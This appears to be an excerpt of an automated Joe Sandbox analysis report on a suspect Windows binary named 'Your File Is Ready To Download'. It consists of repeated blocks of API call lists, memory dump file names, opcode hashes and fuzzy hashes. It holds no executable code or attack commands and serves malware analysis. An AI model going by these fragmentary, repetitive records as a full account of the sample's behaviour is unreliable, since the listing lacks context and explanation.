                                                                                                                                                                                                                          • Sleep.KERNEL32(?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065,?,?,00000000,00000001400CD11C), ref: 00000001400CF272
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno$AllocateHeapSleep_callnewhmalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3606348469-0
                                                                                                                                                                                                                          • Opcode ID: 292fcef106283a31abd679ea3e2e18ada82a1531665a2a9a74516240da803d42
                                                                                                                                                                                                                          • Instruction ID: c44e37fb242dcf048b765f24048ce9215ec8f7e46ac2c1057e4b8cccb008804d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 292fcef106283a31abd679ea3e2e18ada82a1531665a2a9a74516240da803d42
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9501D132214B8486EA1A9F47A40039973A0F78CFD0F580114FF4A0B768EF34D982C784
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00000001400B12D0: GetForegroundWindow.USER32(?,000000014000C660), ref: 00000001400B1324
                                                                                                                                                                                                                            • Part of subcall function 00000001400B12D0: IsWindowVisible.USER32 ref: 00000001400B133E
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0000000140049353
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CountForegroundTickVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2170047217-0
                                                                                                                                                                                                                          • Opcode ID: 5cd9171340ae0c08aec1ca75464200a119c6ec53059f12f3124edf70cf7caf42
                                                                                                                                                                                                                          • Instruction ID: 068b12eddd83bd8cb1277996eee6420d313031d967d61542347af43004245da0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cd9171340ae0c08aec1ca75464200a119c6ec53059f12f3124edf70cf7caf42
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6841D172208B808AF716DB66A4503ED3BB5F74DBD8F01412AEF89477A9CB38C581C344
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00000001400B12D0: GetForegroundWindow.USER32(?,000000014000C660), ref: 00000001400B1324
                                                                                                                                                                                                                            • Part of subcall function 00000001400B12D0: IsWindowVisible.USER32 ref: 00000001400B133E
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0000000140049353
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CountForegroundTickVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2170047217-0
                                                                                                                                                                                                                          • Opcode ID: 1d6b311c9f80a44cfedcc9bdb9d1f91dd8dfb643dc88f4eb26196a1cad482069
                                                                                                                                                                                                                          • Instruction ID: a1f2476f4a3559f2181d3fe8da5a844bc4c9bbed0d65fd141c8f4cf45f53748d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d6b311c9f80a44cfedcc9bdb9d1f91dd8dfb643dc88f4eb26196a1cad482069
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3841C172208B808AF756DB66A4503E93BB5F74DBD8F05412AEF89477A9CB38C582C744
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00000001400B10D0: GetForegroundWindow.USER32(?,?,?,000000014000C62A), ref: 00000001400B1131
                                                                                                                                                                                                                            • Part of subcall function 00000001400B10D0: IsWindowVisible.USER32 ref: 00000001400B114B
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0000000140049353
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CountForegroundTickVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2170047217-0
                                                                                                                                                                                                                          • Opcode ID: 9cb04c8b8f2d02ab0fd6d3837d6dcf59477ee73fd281aa5dd4cac94b6522c635
                                                                                                                                                                                                                          • Instruction ID: 3c17d3e8240aa01bf241aae5cae1974eca1c80cfcfac0340c160a6b7321e75a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cb04c8b8f2d02ab0fd6d3837d6dcf59477ee73fd281aa5dd4cac94b6522c635
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7941C072308A808AFB16DB66A4543E92BB5B74DBD8F054126EF89477B9CB38C581C344
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00000001400B10D0: GetForegroundWindow.USER32(?,?,?,000000014000C62A), ref: 00000001400B1131
                                                                                                                                                                                                                            • Part of subcall function 00000001400B10D0: IsWindowVisible.USER32 ref: 00000001400B114B
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0000000140049353
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CountForegroundTickVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2170047217-0
                                                                                                                                                                                                                          • Opcode ID: 6aeddff5f436e37de097542667335769226eb220401ea4a0deb14b88d1fd5e46
                                                                                                                                                                                                                          • Instruction ID: e4ece6c738b09478acb9bd3fb219e37964d4982bf4437f3a6231e7f6d44f034f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aeddff5f436e37de097542667335769226eb220401ea4a0deb14b88d1fd5e46
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D41C072308A808AFB16DB66A4543E92BB5B74DBD8F054126EF89477B9CB38C581C344
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 024f1d71609417e25df78ba3b5009664177e51f2c5a064d1d53dff50156d85c9
                                                                                                                                                                                                                          • Instruction ID: 20668be9cd8b0780342f6297416fb442c9922363e868988257576e6dd2d57db1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 024f1d71609417e25df78ba3b5009664177e51f2c5a064d1d53dff50156d85c9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89318F71604A8481FB27DB63A8407EA67A4F78DBE8F184223FF69476F5CB74C5818301
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FolderPath
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1514166925-0
                                                                                                                                                                                                                          • Opcode ID: 58e8b232d2d31f3f56c266144180499fb183fed714fc7e8b3ddca1a7014eaa2b
                                                                                                                                                                                                                          • Instruction ID: 947bc37787eb2eb57091b942e04b10a2c2fb4835268c403760bad1cb48cb2716
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58e8b232d2d31f3f56c266144180499fb183fed714fc7e8b3ddca1a7014eaa2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2431F632A1454082EB759B26D8447EE72E2F748790F644B26FF5D87AE4EB39CD458340
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _ui64tow.LIBCMT ref: 0000000140071CAD
                                                                                                                                                                                                                            • Part of subcall function 00000001400B10D0: GetForegroundWindow.USER32(?,?,?,000000014000C62A), ref: 00000001400B1131
                                                                                                                                                                                                                            • Part of subcall function 00000001400B10D0: IsWindowVisible.USER32 ref: 00000001400B114B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$ForegroundVisible_ui64tow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1685772607-0
                                                                                                                                                                                                                          • Opcode ID: 052ad26a427877cae9d8842cbfea6538e8fffc477bc1f08b2fd2bd17a146ba1c
                                                                                                                                                                                                                          • Instruction ID: bbfc68ea4e07141d68df2153f1fa83c1cddebd5bfd1fb98bdaa7138fcbfecd34
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 052ad26a427877cae9d8842cbfea6538e8fffc477bc1f08b2fd2bd17a146ba1c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B316932608B8481E711DF56E48478AB7A4F3887D8F548129EF8C477A9CB79C546CB40
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                                                                                          • Opcode ID: 8c6c7109fd51ce16c6543a1a8f1abf49a824e6daab550956bf8085be357ef6e2
                                                                                                                                                                                                                          • Instruction ID: 9a6caf129f52177e355402dbcec9f0ba6e217b23fe4cd1b6085e6d60462d6e31
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c6c7109fd51ce16c6543a1a8f1abf49a824e6daab550956bf8085be357ef6e2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D921F73170564242FA769B17A4003EE2781ABCDBD4F564834FF450B7F6EB38C8418348
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCPInfo.KERNEL32 ref: 0000000140020542
                                                                                                                                                                                                                            • Part of subcall function 00000001400203C0: FindResourceW.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 00000001400203FB
                                                                                                                                                                                                                            • Part of subcall function 00000001400203C0: FindResourceW.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 0000000140020417
                                                                                                                                                                                                                            • Part of subcall function 00000001400203C0: SizeofResource.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 000000014002042E
                                                                                                                                                                                                                            • Part of subcall function 00000001400203C0: LoadResource.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 0000000140020441
                                                                                                                                                                                                                            • Part of subcall function 00000001400203C0: LockResource.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 000000014002044F
                                                                                                                                                                                                                            • Part of subcall function 00000001400C9A10: HeapFree.KERNEL32(?,?,00000000,00000001400CD130,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400C9A26
                                                                                                                                                                                                                            • Part of subcall function 00000001400C9A10: _errno.LIBCMT ref: 00000001400C9A30
                                                                                                                                                                                                                            • Part of subcall function 00000001400C9A10: GetLastError.KERNEL32(?,?,00000000,00000001400CD130,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400C9A38
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$Find$ErrorFreeHeapInfoLastLoadLockSizeof_errno
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2021521633-0
                                                                                                                                                                                                                          • Opcode ID: d6386fe12684b44ed7ccb635f6e22d2d443ddb5fa0eccfc47a88c4aa949c7a14
                                                                                                                                                                                                                          • Instruction ID: d2581fc6965fcb9cd5414fcd9eaa73160b58b27b9df1bcac88176e33a72fac09
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6386fe12684b44ed7ccb635f6e22d2d443ddb5fa0eccfc47a88c4aa949c7a14
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D111372304BA089E716CF72A4407EE36A9E70CBC8F04082AFF4A53A5ACA34C955C781
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProcVisibleWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3687547122-0
                                                                                                                                                                                                                          • Opcode ID: e0cfbfe6f62c831c6aa278d473c7f519c1c571767cc38b36f924a90972b37a1e
                                                                                                                                                                                                                          • Instruction ID: f70707d4431d8fb35a4e9d8c6b71cb6c932db20b169d1b7ffca47ecce951dd75
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0cfbfe6f62c831c6aa278d473c7f519c1c571767cc38b36f924a90972b37a1e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0F03171704E8051FB569FA7A2413FC63A4EB8DBC4F4C5030BF49476AAEE34C5918714
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountMessagePostTick
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1233319983-0
                                                                                                                                                                                                                          • Opcode ID: 2074976bd7cf999bdea5e5f536954da0db2ffd285c679d57a622711dffce0d94
                                                                                                                                                                                                                          • Instruction ID: 06614c12ff779bd4e11d61368138d2119cf4132a9b800c3e540040bf45b9906b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2074976bd7cf999bdea5e5f536954da0db2ffd285c679d57a622711dffce0d94
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5E04F36314AC1C4D7A2DA23A4043DB5325F74CBD0F584452EF8A537A6DE39D847C304
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • Sleep.KERNEL32(?,?,00000000,00000001400CD0F7,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CF2F9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep_errno
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1068366078-0
                                                                                                                                                                                                                          • Opcode ID: 44ec7645bf7145562d6450075c1070846455dc622797d2b44ee487d68ac9cb2e
                                                                                                                                                                                                                          • Instruction ID: c3102fcdc3094b84445531ce05af16c6a901c2b2566dea57e8f9b88cb556d0eb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44ec7645bf7145562d6450075c1070846455dc622797d2b44ee487d68ac9cb2e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C401D132321B80C6EA4A9F27A84039DB6A1F78CFD0F094121FF5A07BA4CB38D952C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
